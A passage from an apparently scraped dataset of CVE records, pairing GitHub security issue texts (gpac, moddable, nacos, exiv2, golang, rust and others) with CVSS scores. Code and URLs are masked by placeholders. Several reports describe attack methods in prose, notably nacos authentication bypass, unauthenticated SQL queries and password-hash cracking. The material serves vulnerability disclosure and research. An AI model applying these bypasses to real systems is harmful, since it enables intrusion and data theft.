  65151. "description": "Regression of NUMBERTAG APITAG allows input of SCRIPT tag. Reported by MENTIONTAG at NUMBERTAG T NUMBERTAG I'm a security researcher who has been fuzzing famous XSS sanitizers. > APITAG fuzzing the sanitizers, my fuzzer triggered an alert that shows bluemonday is vulnerable to bypass. > After some checks, I confirmed that this is a vulnerability, so I'm reporting it here. > > While checking the issues on the bluemonday repository, I realized that this is the same issue as URLTAG APITAG must be resolved already as it's closed.) > As there is no doubt this vulnerability occurred again in somewhere of previous commits, I decided to find it. > And it was a commit that added vulnerable code again: URLTAG (It's now moved to here: URLTAG ) > FILETAG > To reproduce this, please use the following steps NUMBERTAG Download the attached FILETAG NUMBERTAG Extract it NUMBERTAG Run test.go: \"go run test.go NUMBERTAG Sanitization bypass will be shown. > > If you are going to fix this issue, please let me know. I can assign CVE to notify this issue to users. > > Best regards, > APITAG",
  65152. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  65153. "severity": "MEDIUM",
  65154. "baseScore": 6.1,
  65155. "impactScore": 2.7,
  65156. "exploitabilityScore": 2.8
  65157. },
  65158. {
  65159. "CVE_ID": "CVE-2021-29279",
  65160. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1718",
  65161. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1718",
  65162. "Repo_new": "gpac/gpac",
  65163. "Issue_Created_At": "2021-03-28T14:19:47Z",
  65164. "description": "An integer overflow in function APITAG There is an integer overflow in function APITAG . In it, the argument APITAG (possibly the value APITAG) may be a negative number. As a result, the memcpy in gf_props_assign_value fails. Moreover, this bug may result in a heap overflow with a crafted file. In command line: FILETAG In gdb: FILETAG The crafted file is in the attached zip: FILETAG",
  65165. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  65166. "severity": "HIGH",
  65167. "baseScore": 7.8,
  65168. "impactScore": 5.9,
  65169. "exploitabilityScore": 1.8
  65170. },
  65171. {
  65172. "CVE_ID": "CVE-2021-29313",
  65173. "Issue_Url_old": "https://github.com/ciweiin/seacms/issues/14",
  65174. "Issue_Url_new": "https://github.com/ciweiin/seacms/issues/14",
  65175. "Repo_new": "ciweiin/seacms",
  65176. "Issue_Created_At": "2021-03-23T12:55:22Z",
  65177. "description": "seacms NUMBERTAG statcode reflected xss vulnerability. An XSS vulnerability was discovered in seacms NUMBERTAG There is a stored XSS vulnerability which allows remote attackers to inject arbitrary web script or HTML via the v_company and v_tvs parameters of APITAG POC NUMBERTAG APITAG alert NUMBERTAG APITAG CODETAG NUMBERTAG choose this part and write poc to form FILETAG NUMBERTAG submit and view webpage FILETAG FILETAG",
  65178. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  65179. "severity": "MEDIUM",
  65180. "baseScore": 6.1,
  65181. "impactScore": 2.7,
  65182. "exploitabilityScore": 2.8
  65183. },
  65184. {
  65185. "CVE_ID": "CVE-2021-29324",
  65186. "Issue_Url_old": "https://github.com/Moddable-OpenSource/moddable/issues/586",
  65187. "Issue_Url_new": "https://github.com/moddable-opensource/moddable/issues/586",
  65188. "Repo_new": "moddable-opensource/moddable",
  65189. "Issue_Created_At": "2021-02-26T10:34:42Z",
  65190. "description": "stack overflow. Environment APITAG poc: ERRORTAG description ERRORTAG",
  65191. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  65192. "severity": "HIGH",
  65193. "baseScore": 7.8,
  65194. "impactScore": 5.9,
  65195. "exploitabilityScore": 1.8
  65196. },
  65197. {
  65198. "CVE_ID": "CVE-2021-29325",
  65199. "Issue_Url_old": "https://github.com/Moddable-OpenSource/moddable/issues/582",
  65200. "Issue_Url_new": "https://github.com/moddable-opensource/moddable/issues/582",
  65201. "Repo_new": "moddable-opensource/moddable",
  65202. "Issue_Created_At": "2021-02-26T10:30:19Z",
  65203. "description": "heap buffer APITAG Environment APITAG poc: ERRORTAG description ERRORTAG",
  65204. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  65205. "severity": "HIGH",
  65206. "baseScore": 7.8,
  65207. "impactScore": 5.9,
  65208. "exploitabilityScore": 1.8
  65209. },
  65210. {
  65211. "CVE_ID": "CVE-2021-29326",
  65212. "Issue_Url_old": "https://github.com/Moddable-OpenSource/moddable/issues/583",
  65213. "Issue_Url_new": "https://github.com/moddable-opensource/moddable/issues/583",
  65214. "Repo_new": "moddable-opensource/moddable",
  65215. "Issue_Created_At": "2021-02-26T10:30:40Z",
  65216. "description": "heap buffer APITAG Environment APITAG poc: ERRORTAG description ERRORTAG",
  65217. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  65218. "severity": "HIGH",
  65219. "baseScore": 7.8,
  65220. "impactScore": 5.9,
  65221. "exploitabilityScore": 1.8
  65222. },
  65223. {
  65224. "CVE_ID": "CVE-2021-29327",
  65225. "Issue_Url_old": "https://github.com/Moddable-OpenSource/moddable/issues/580",
  65226. "Issue_Url_new": "https://github.com/moddable-opensource/moddable/issues/580",
  65227. "Repo_new": "moddable-opensource/moddable",
  65228. "Issue_Created_At": "2021-02-26T10:30:01Z",
  65229. "description": "heap buffer APITAG Environment APITAG poc: ERRORTAG description ERRORTAG",
  65230. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  65231. "severity": "HIGH",
  65232. "baseScore": 7.8,
  65233. "impactScore": 5.9,
  65234. "exploitabilityScore": 1.8
  65235. },
  65236. {
  65237. "CVE_ID": "CVE-2021-29328",
  65238. "Issue_Url_old": "https://github.com/Moddable-OpenSource/moddable/issues/585",
  65239. "Issue_Url_new": "https://github.com/moddable-opensource/moddable/issues/585",
  65240. "Repo_new": "moddable-opensource/moddable",
  65241. "Issue_Created_At": "2021-02-26T10:32:47Z",
  65242. "description": "over APITAG Environment APITAG poc: ERRORTAG description ERRORTAG",
  65243. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  65244. "severity": "HIGH",
  65245. "baseScore": 7.1,
  65246. "impactScore": 5.2,
  65247. "exploitabilityScore": 1.8
  65248. },
  65249. {
  65250. "CVE_ID": "CVE-2021-29329",
  65251. "Issue_Url_old": "https://github.com/Moddable-OpenSource/moddable/issues/587",
  65252. "Issue_Url_new": "https://github.com/moddable-opensource/moddable/issues/587",
  65253. "Repo_new": "moddable-opensource/moddable",
  65254. "Issue_Created_At": "2021-02-26T10:36:48Z",
  65255. "description": "stack APITAG Enviroment APITAG poc: ERRORTAG description ERRORTAG",
  65256. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  65257. "severity": "HIGH",
  65258. "baseScore": 7.8,
  65259. "impactScore": 5.9,
  65260. "exploitabilityScore": 1.8
  65261. },
  65262. {
  65263. "CVE_ID": "CVE-2021-29338",
  65264. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/1338",
  65265. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/1338",
  65266. "Repo_new": "uclouvain/openjpeg",
  65267. "Issue_Created_At": "2021-03-24T05:21:26Z",
  65268. "description": "Integer Overflow in num_images. Hello openjpeg2 team, I found an integer overflow vulnerability in the command line options. APITAG If there are many files in the imgdir directory, the number of files read by opj_compress will overflow. openjpeg2 (tested with revision master APITAG run command APITAG asan info ERRORTAG APITAG When num_images is equal to NUMBERTAG, multiplying it with OPJ_PATH_LEN produces an overflowed result of NUMBERTAG FILETAG",
  65269. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  65270. "severity": "MEDIUM",
  65271. "baseScore": 5.5,
  65272. "impactScore": 3.6,
  65273. "exploitabilityScore": 1.8
  65274. },
  65275. {
  65276. "CVE_ID": "CVE-2021-29349",
  65277. "Issue_Url_old": "https://github.com/0xBaz/CVE-2021-29349/issues/1",
  65278. "Issue_Url_new": "https://github.com/0xbaz/cve-2021-29349/issues/1",
  65279. "Repo_new": "0xbaz/cve-2021-29349",
  65280. "Issue_Created_At": "2021-03-31T20:04:33Z",
  65281. "description": "CVETAG . Hi, Product : Mahara NUMBERTAG Website : FILETAG Login Details : APITAG Description : Cross Site Request Forgery (CSRF) that allows a remote attacker to remove inbox mail on the server. The application fails to validate the CSRF token for a POST request. An attacker can craft the FILETAG directory, which leads to removing all messages from a mailbox. Video POC : Google Drive Video URLTAG POC : CODETAG Recommendations NUMBERTAG Implement X CSRF TOKEN and make sure it's validating in back end server as well NUMBERTAG Implement an interceptor which appends token value to every (state changing) request in custom request header APITAG",
  65282. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  65283. "severity": "MEDIUM",
  65284. "baseScore": 6.5,
  65285. "impactScore": 3.6,
  65286. "exploitabilityScore": 2.8
  65287. },
  65288. {
  65289. "CVE_ID": "CVE-2021-29441",
  65290. "Issue_Url_old": "https://github.com/alibaba/nacos/issues/4701",
  65291. "Issue_Url_new": "https://github.com/alibaba/nacos/issues/4701",
  65292. "Repo_new": "alibaba/nacos",
  65293. "Issue_Created_At": "2021-01-14T09:52:31Z",
  65294. "description": "Report a security vulnerability in nacos to bypass authentication(identity) again. english Hello, I\u2019m threedr3am. I found that the latest version NUMBERTAG of nacos still has a bypass problem for the APITAG key value repair mechanism that bypasses security vulnerabilities in User Agent. The custom key value authentication of APITAG is enabled in nacos. Later, through the special url structure, it is still possible to bypass the restriction to access any http interface. By viewing this function, you need to add the configuration APITAG in APITAG to avoid the ERRORTAG POST URLTAG CODETAG APITAG APITAG APITAG public class APITAG implements Filter { MENTIONTAG private APITAG APITAG MENTIONTAG private APITAG APITAG MENTIONTAG private APITAG APITAG private APITAG extends APITAG APITAG APITAG = new APITAG MENTIONTAG public void APITAG request, APITAG response, APITAG chain) throws ERRORTAG ERRORTAG { if APITAG { APITAG response); return; } APITAG req = APITAG request; APITAG resp = APITAG response; if APITAG { String APITAG = APITAG if APITAG APITAG { APITAG response); return; } } else if APITAG && APITAG APITAG { String APITAG = APITAG if APITAG { APITAG response); return; } APITAG server identity value for {} from {}\", APITAG APITAG } else { ERRORTAG APITAG server identity key or value, Please make sure set APITAG \" + \" and APITAG , or open APITAG \"); return; } try { Method method = APITAG if (method == null) { APITAG response); return; } ...\u9274\u6743\u4ee3\u7801 } ... } ... } APITAG APITAG APITAG User Agent: Nacos Server CODETAG '' in APITAG the simple key value authentication mechanism is turned on Then, it will get a value from the http header according to the APITAG configured by the developer, and then go to the APITAG is matched, if it does not match, it will not enter the branch execution: APITAG But the problem is precisely here. 
The correct logic would be to deny the request outright when the server-identity value does not match; instead the filter falls through, which is what allows the later condition to be used for a bypass. Looking further down, the code comes to: CODETAG As you can see, there is a check APITAG ; as long as this condition is met, the subsequent authentication code is never reached. By looking at the APITAG code implementation, I found a way to make the returned method null APITAG APITAG ERRORTAG ERRORTAG In this code, you can clearly see that the returned method value depends on CODETAG The key of APITAG is whether the mapping value can be obtained from APITAG of APITAG In the composition of APITAG there is a path part, and there is a problem with how this part is generated. It is obtained in the following way: APITAG For a normal visit, such as APITAG , the path obtained will be APITAG , while through a specially constructed URL, such as APITAG , the path will be APITAG In this way, the attacker controls the trailing slash '/' of the path, so the method cannot be found in the APITAG APITAG Why? Because basically all APITAG in nacos do not end with a slash '/'; only the APITAG without a trailing slash '/' exists and is stored in the APITAG of APITAG so the outermost APITAG condition is satisfied, thus bypassing the authentication mechanism NUMBERTAG The scope of the vulnerability Sphere of influence NUMBERTAG Vulnerability reproduction NUMBERTAG Access the user list interface APITAG As you can see, the authentication is bypassed and the user list data is returned CODETAG NUMBERTAG Add a new user APITAG As you can see, authentication has been bypassed and a new user has been added APITAG NUMBERTAG View the user list again APITAG As you can see, in the returned user list data, there is one more user, which we created by bypassing authentication. 
CODETAG NUMBERTAG isit the homepage APITAG , log in to the new account, and you can do anything \u4e2d\u6587 APITAG APITAG key APITAG APITAG APITAG APITAG \uff0c\u624d\u80fd\u907f\u514d APITAG \u7ed5\u8fc7\u9274\u6743\u7684\u5b89\u5168\u95ee\u9898\u3002 APITAG \u8c03\u7528\u6dfb\u52a0\u7528\u6237\u63a5\u53e3\uff0c\u6dfb\u52a0\u65b0\u7528\u6237\uff08 APITAG APITAG \u4e00\u3001\u6f0f\u6d1e\u8be6\u60c5 \u95ee\u9898\u4e3b\u8981\u51fa\u73b0\u5728 APITAG : ERRORTAG \u53ef\u4ee5\u770b\u5230\uff0c\u4e0a\u9762\u4e09\u4e2aif else\u5206\u652f\uff1a \u7b2c\u4e00\u4e2a\u662f APITAG APITAG Agent\u662f\u5426\u5339\u914d APITAG \uff0c\u82e5\u5339\u914d\uff0c\u5219\u8df3\u8fc7\u540e\u7eed\u6240\u6709\u903b\u8f91\uff0c\u6267\u884c APITAG \u7b2c\u4e8c\u4e2a\u662f APITAG \uff0c\u4e5f\u5c31\u662fnacos NUMBERTAG APITAG \u5b89\u5168\u95ee\u9898\u7684\u7b80\u5355\u4fee\u590d APITAG APITAG APITAG \uff0c\u5f00\u542f\u8be5key value\u7b80\u5355\u9274\u6743\u673a\u5236\u540e\uff0c\u4f1a\u6839\u636e\u5f00\u53d1\u8005\u914d\u7f6e\u7684 APITAG \u53bbhttp header\u4e2d\u83b7\u53d6\u4e00\u4e2avalue\uff0c\u53bb\u8ddf\u5f00\u53d1\u8005\u914d\u7f6e\u7684 APITAG \u8fdb\u884c\u5339\u914d\uff0c\u82e5\u4e0d\u5339\u914d\uff0c\u5219\u4e0d\u8fdb\u5165\u5206\u652f\u6267\u884c\uff1a APITAG APITAG \u518d\u5f80\u4e0b\u770b\uff0c\u4ee3\u7801\u6765\u5230\uff1a CODETAG \u53ef\u4ee5\u770b\u5230\uff0c\u8fd9\u91cc\u6709\u4e00\u4e2a\u5224\u65ad APITAG \uff0c\u53ea\u8981\u6ee1\u8db3\u8fd9\u4e2a\u6761\u4ef6\uff0c\u5c31\u4e0d\u4f1a\u8d70\u5230\u540e\u7eed\u7684\u9274\u6743\u4ee3\u7801\u3002 \u901a\u8fc7\u67e5\u770b APITAG APITAG APITAG APITAG ERRORTAG ERRORTAG APITAG CODETAG APITAG APITAG APITAG \u4e00\u4e2a\u6b63\u5e38\u7684\u8bbf\u95ee\uff0c\u6bd4\u5982 APITAG \uff0c\u5f97\u5230\u7684path\u5c06\u4f1a\u662f APITAG \uff0c\u800c\u901a\u8fc7\u7279\u6b8a\u6784\u9020\u7684url\uff0c\u6bd4\u5982 APITAG \uff0c\u5f97\u5230\u7684path\u5c06\u4f1a\u662f APITAG PATHTAG APITAG NUMBERTAG APITAG 
\u53ef\u4ee5\u770b\u5230\uff0c\u7ed5\u8fc7\u4e86\u9274\u6743\uff0c\u8fd4\u56de\u4e86\u7528\u6237\u5217\u8868\u6570\u636e CODETAG NUMBERTAG APITAG \u53ef\u4ee5\u770b\u5230\uff0c\u7ed5\u8fc7\u4e86\u9274\u6743\uff0c\u6dfb\u52a0\u4e86\u65b0\u7528\u6237 APITAG NUMBERTAG APITAG APITAG CODETAG NUMBERTAG APITAG \uff0c\u767b\u5f55\u65b0\u8d26\u53f7\uff0c\u53ef\u4ee5\u505a\u4efb\u4f55\u4e8b\u60c5 regards, threedr3am",
  65295. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  65296. "severity": "CRITICAL",
  65297. "baseScore": 9.8,
  65298. "impactScore": 5.9,
  65299. "exploitabilityScore": 3.9
  65300. },
  65301. {
  65302. "CVE_ID": "CVE-2021-29442",
  65303. "Issue_Url_old": "https://github.com/alibaba/nacos/issues/4463",
  65304. "Issue_Url_new": "https://github.com/alibaba/nacos/issues/4463",
  65305. "Repo_new": "alibaba/nacos",
  65306. "Issue_Created_At": "2020-12-12T06:55:26Z",
  65307. "description": "Report a security vulnerability in nacos to execute arbitrary SQL without authentication. \uff08english\uff09 Hello, I am threedr3am. I found a nacos interface. When nacos is deployed in the default configuration, it can be accessed without authentication and used to execute arbitrary SQL queries, which leads to the disclosure of sensitive information NUMBERTAG Vulnerability details Source address: URLTAG Auditing the code shows that there is an interface in the config server through which SQL statements can be executed without any authentication, so all data can be leaked. The vulnerability lies in the module: APITAG in nacos config ERRORTAG As you can see, the code only checks that the statement contains select, so any select query statement can be executed. Through testing, you can use the following statement to query all database information CODETAG The most important thing is that the interface does not require any authentication and can be accessed directly. After reading the account names and the hashed passwords, the hashes can be attacked offline with the help of the open source program's source code, because the salt generation algorithm used when nacos creates an account uses default values. 
Look at the source code APITAG ERRORTAG As you can see, they are all default and users cannot modify them Therefore, refer to the tool class APITAG In this way, the password represented by the hash value can be quickly blasted locally CODETAG NUMBERTAG the loopholes reproduce Deployment process NUMBERTAG Go to github to download the latest release: URLTAG NUMBERTAG Execute PATHTAG m standalone to run locally poc\uff1a APITAG NUMBERTAG Scope of influence All versions \uff08\u4e2d\u6587\uff09 APITAG \u4e00\u3001\u6f0f\u6d1e\u8be6\u60c5 \u6e90\u7801\u5730\u5740\uff1a URLTAG \u5ba1\u8ba1\u4ee3\u7801\u53ef\u4ee5\u53d1\u73b0\uff0cconfig APITAG \u6f0f\u6d1e\u70b9\u5728\u4e8emodule\uff1anacos APITAG ERRORTAG APITAG \u901a\u8fc7\u6d4b\u8bd5\uff0c\u53ef\u4ee5\u7528\u4ee5\u4e0b\u7684\u8bed\u53e5\u67e5\u8be2\u5230\u6240\u6709\u6570\u636e\u5e93\u4fe1\u606f CODETAG \u6700\u91cd\u8981\u7684\u662f\uff0c\u8be5\u63a5\u53e3\u4e0d\u9700\u8981\u4efb\u4f55\u8ba4\u8bc1\uff0c\u76f4\u63a5\u5c31\u53ef\u4ee5\u8bbf\u95ee APITAG APITAG ERRORTAG \u53ef\u4ee5\u770b\u5230\uff0c\u90fd\u662f\u9ed8\u8ba4\u7684\uff0c\u4f7f\u7528\u8005\u6ca1\u6cd5\u505a\u4fee\u6539 APITAG \u901a\u8fc7\u8fd9\u6837\u7684\u65b9\u5f0f\uff0c\u53ef\u4ee5\u5728\u672c\u5730\u5feb\u901f\u7684\u7206\u7834\u51fahash\u503c\u8868\u793a\u7684\u5bc6\u7801 CODETAG NUMBERTAG github\u4e0b\u8f7d\u6700\u65b0\u7248release\uff1a URLTAG NUMBERTAG PATHTAG m standalone\u672c\u5730\u8fd0\u884c poc\uff1a APITAG \u4e09\u3001\u5f71\u54cd\u8303\u56f4 \u6240\u6709\u7248\u672c",
  65308. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  65309. "severity": "HIGH",
  65310. "baseScore": 7.5,
  65311. "impactScore": 3.6,
  65312. "exploitabilityScore": 3.9
  65313. },
  65314. {
  65315. "CVE_ID": "CVE-2021-29457",
  65316. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/1529",
  65317. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/1529",
  65318. "Repo_new": "exiv2/exiv2",
  65319. "Issue_Created_At": "2021-04-08T03:01:08Z",
  65320. "description": "heap buffer overflow write in APITAG VERSION exi NUMBERTAG URLTAG REPRODUCE Compile exi NUMBERTAG with asan: CODETAG Download testcases: URLTAG FILETAG exi NUMBERTAG in APITAG ERRORTAG Credit: Zhen Zhou of NSFOCUS Security Team",
  65321. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  65322. "severity": "HIGH",
  65323. "baseScore": 7.8,
  65324. "impactScore": 5.9,
  65325. "exploitabilityScore": 1.8
  65326. },
  65327. {
  65328. "CVE_ID": "CVE-2021-29458",
  65329. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/1530",
  65330. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/1530",
  65331. "Repo_new": "exiv2/exiv2",
  65332. "Issue_Created_At": "2021-04-08T07:27:55Z",
  65333. "description": "heap buffer overflow Read in APITAG VERSION exi NUMBERTAG URLTAG REPRODUCE Compile exi NUMBERTAG with asan: CODETAG Download testcases: URLTAG FILETAG Run command: APITAG ERRORTAG Credit: Zhen Zhou of NSFOCUS Security Team",
  65334. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  65335. "severity": "MEDIUM",
  65336. "baseScore": 5.5,
  65337. "impactScore": 3.6,
  65338. "exploitabilityScore": 1.8
  65339. },
  65340. {
  65341. "CVE_ID": "CVE-2021-29476",
  65342. "Issue_Url_old": "https://github.com/ambionics/phpggc/issues/52",
  65343. "Issue_Url_new": "https://github.com/ambionics/phpggc/issues/52",
  65344. "Repo_new": "ambionics/phpggc",
  65345. "Issue_Created_At": "2019-04-29T20:14:43Z",
  65346. "description": "Wrapper to bypass checks. There is a trick which can be used to bypass some attempts to validate the serialised data given: Put a APITAG before all integer values of Object and/or Classes (there might be also possible for integer and string, haven't checked). For instance: APITAG would become APITAG So far I am using a wrapper as this is a very specific situation to bypass the check in place: ERRORTAG However, it might be interesting to add it as an enhancement",
  65347. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  65348. "severity": "CRITICAL",
  65349. "baseScore": 9.8,
  65350. "impactScore": 5.9,
  65351. "exploitabilityScore": 3.9
  65352. },
  65353. {
  65354. "CVE_ID": "CVE-2021-29482",
  65355. "Issue_Url_old": "https://github.com/ulikunitz/xz/issues/35",
  65356. "Issue_Url_new": "https://github.com/ulikunitz/xz/issues/35",
  65357. "Repo_new": "ulikunitz/xz",
  65358. "Issue_Created_At": "2020-08-18T20:54:07Z",
  65359. "description": "[SECURITY] Implementation of APITAG vulnerable to CVETAG . Implementation of APITAG at URLTAG is very similar to the vulnerable code in the Golang APITAG library and seems to suffer from the same vulnerability described in URLTAG See the fix at FILETAG Note: I couldn't find any information on how to disclose this issue to the maintainers. I would also suggest setting up a Security Policy for the project within APITAG",
  65360. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  65361. "severity": "HIGH",
  65362. "baseScore": 7.5,
  65363. "impactScore": 3.6,
  65364. "exploitabilityScore": 3.9
  65365. },
  65366. {
  65367. "CVE_ID": "CVE-2021-29486",
  65368. "Issue_Url_old": "https://github.com/DrPaulBrewer/cumulative-distribution-function/issues/7",
  65369. "Issue_Url_new": "https://github.com/drpaulbrewer/cumulative-distribution-function/issues/7",
  65370. "Repo_new": "drpaulbrewer/cumulative-distribution-function",
  65371. "Issue_Created_At": "2021-04-09T13:36:47Z",
  65372. "description": "cdf never yields result for certain input. Hi, thank you for providing this package. Given a specific data set we found that the function gets stuck in a while loop. This can be reproduced reliably through the following example: ERRORTAG I hope you find this useful.",
  65373. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  65374. "severity": "HIGH",
  65375. "baseScore": 7.5,
  65376. "impactScore": 3.6,
  65377. "exploitabilityScore": 3.9
  65378. },
  65379. {
  65380. "CVE_ID": "CVE-2021-29499",
  65381. "Issue_Url_old": "https://github.com/satori/go.uuid/issues/73",
  65382. "Issue_Url_new": "https://github.com/satori/go.uuid/issues/73",
  65383. "Repo_new": "satori/go.uuid",
  65384. "Issue_Created_At": "2018-03-23T20:58:32Z",
  65385. "description": "APITAG non random uuid. I'm running this on my macbook pro. I'm using APITAG to generate random identifiers. I'm generating these identifiers at a _very_ low rate of a few dozen per day. Here are some non random UUIDs that I got in the last weeks: CODETAG",
  65386. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  65387. "severity": "HIGH",
  65388. "baseScore": 7.5,
  65389. "impactScore": 3.6,
  65390. "exploitabilityScore": 3.9
  65391. },
  65392. {
  65393. "CVE_ID": "CVE-2021-29922",
  65394. "Issue_Url_old": "https://github.com/rust-lang/rust/issues/83648",
  65395. "Issue_Url_new": "https://github.com/rust-lang/rust/issues/83648",
  65396. "Repo_new": "rust-lang/rust",
  65397. "Issue_Created_At": "2021-03-29T16:13:38Z",
  65398. "description": "APITAG Incorrect Parsing for Octal format IP string . This issue is inspired by this blog URLTAG . Due to the specification, a leading zero in an IP string is interpreted as an octal literal. So an IP address APITAG actually means APITAG . As shown in the following example: APITAG However, the APITAG from the std library will recognize it as APITAG instead. A simple code to demo the situation ( playground link URLTAG : CODETAG I expected to see this happen: APITAG Instead, this happened: APITAG Note that this bug may cause a security vulnerability in certain cases. For example, a Rust program may use APITAG for a sanity check and then pass the original user string to another library or program that follows the octal interpretation, so the two sides disagree about which address is meant. Furthermore, the specification actually also allows hex format in IP strings. Meta APITAG : APITAG",
  65399. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
  65400. "severity": "CRITICAL",
  65401. "baseScore": 9.1,
  65402. "impactScore": 5.2,
  65403. "exploitabilityScore": 3.9
  65404. },
  65405. {
  65406. "CVE_ID": "CVE-2021-29923",
  65407. "Issue_Url_old": "https://github.com/golang/go/issues/43389",
  65408. "Issue_Url_new": "https://github.com/golang/go/issues/43389",
  65409. "Repo_new": "golang/go",
  65410. "Issue_Created_At": "2020-12-26T16:59:03Z",
  65411. "description": "net: limit the size of APITAG input?. Maybe APITAG shouldn't successfully parse IP addresses out of unbounded inputs? e.g. APITAG passes, as does APITAG ( URLTAG Of course, in both those cases the data is already fully in memory, so most of the harm has been done if this is attacker controlled. Still, a bit surprising. Intentional? Some parsers reject past NUMBERTAG digits, so APITAG is valid, but not more than NUMBERTAG bytes for an IP NUMBERTAG address.",
  65412. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  65413. "severity": "HIGH",
  65414. "baseScore": 7.5,
  65415. "impactScore": 3.6,
  65416. "exploitabilityScore": 3.9
  65417. },
  65418. {
  65419. "CVE_ID": "CVE-2021-29923",
  65420. "Issue_Url_old": "https://github.com/golang/go/issues/30999",
  65421. "Issue_Url_new": "https://github.com/golang/go/issues/30999",
  65422. "Repo_new": "golang/go",
  65423. "Issue_Created_At": "2019-03-22T06:48:19Z",
  65424. "description": "net/http: octal literals in IP addresses are interpreted as decimal ones. What version of Go are you using ( go version )? APITAG $ go version go version APITAG linux/amd NUMBERTAG APITAG Does this issue reproduce with the latest release? Yes. What operating system and processor architecture are you using ( go env )? APITAG APITAG APITAG go env APITAG Output APITAG APITAG APITAG $ go env GOARCH=\"amd NUMBERTAG GOBIN=\"\" PATHTAG GOEXE=\"\" GOFLAGS=\"\" GOHOSTARCH=\"amd NUMBERTAG GOHOSTOS=\"linux\" GOOS=\"linux\" PATHTAG GOPROXY=\"\" GORACE=\"\" PATHTAG GOTMPDIR=\"\" PATHTAG GCCGO=\"gccgo\" CC=\"gcc\" CXX=\"g++\" CGO_ENABLED NUMBERTAG GOMOD=\"\" CGO_CFLAGS=\" g O2\" CGO_CPPFLAGS=\"\" CGO_CXXFLAGS=\" g O2\" CGO_FFLAGS=\" g O2\" CGO_LDFLAGS=\" g O2\" PKG_CONFIG=\"pkg config\" GOGCCFLAGS=\" fPIC m NUMBERTAG pthread fmessage length NUMBERTAG PATHTAG gno record gcc switches\" APITAG APITAG What did you do? APITAG What did you expect to see? APITAG is interpreted as APITAG . APITAG What did you see instead? The program tries to connect to APITAG .",
  65425. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  65426. "severity": "HIGH",
  65427. "baseScore": 7.5,
  65428. "impactScore": 3.6,
  65429. "exploitabilityScore": 3.9
  65430. },
  65431. {
  65432. "CVE_ID": "CVE-2021-29978",
  65433. "Issue_Url_old": "https://github.com/mozilla-mobile/mozilla-vpn-client/issues/803",
  65434. "Issue_Url_new": "https://github.com/mozilla-mobile/mozilla-vpn-client/issues/803",
  65435. "Repo_new": "mozilla-mobile/mozilla-vpn-client",
  65436. "Issue_Created_At": "2021-04-07T15:53:29Z",
  65437. "description": "FVP NUMBERTAG WP5: Android app allows backups of application data. The APITAG property in the FILETAG file specifies if the data pertinent to the apps can be backed up NUMBERTAG Without setting the APITAG flag to false, the backup feature is enabled by default. In case an attacker is able to send adb commands to user phones, they could get access to all of the stored data from the protected data folders, inclusive of the VPN configuration data. Affected File: APITAG As this feature does not require a rooted phone, disallowing backups completely should be considered. Due to the fact that an absence of the flag will set it to true by default, it is recommended to explicitly set the APITAG flag to false within the application tag.",
  65438. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  65439. "severity": "CRITICAL",
  65440. "baseScore": 9.8,
  65441. "impactScore": 5.9,
  65442. "exploitabilityScore": 3.9
  65443. },
  65444. {
  65445. "CVE_ID": "CVE-2021-29978",
  65446. "Issue_Url_old": "https://github.com/mozilla-mobile/mozilla-vpn-client/issues/805",
  65447. "Issue_Url_new": "https://github.com/mozilla-mobile/mozilla-vpn-client/issues/805",
  65448. "Repo_new": "mozilla-mobile/mozilla-vpn-client",
  65449. "Issue_Created_At": "2021-04-07T15:55:02Z",
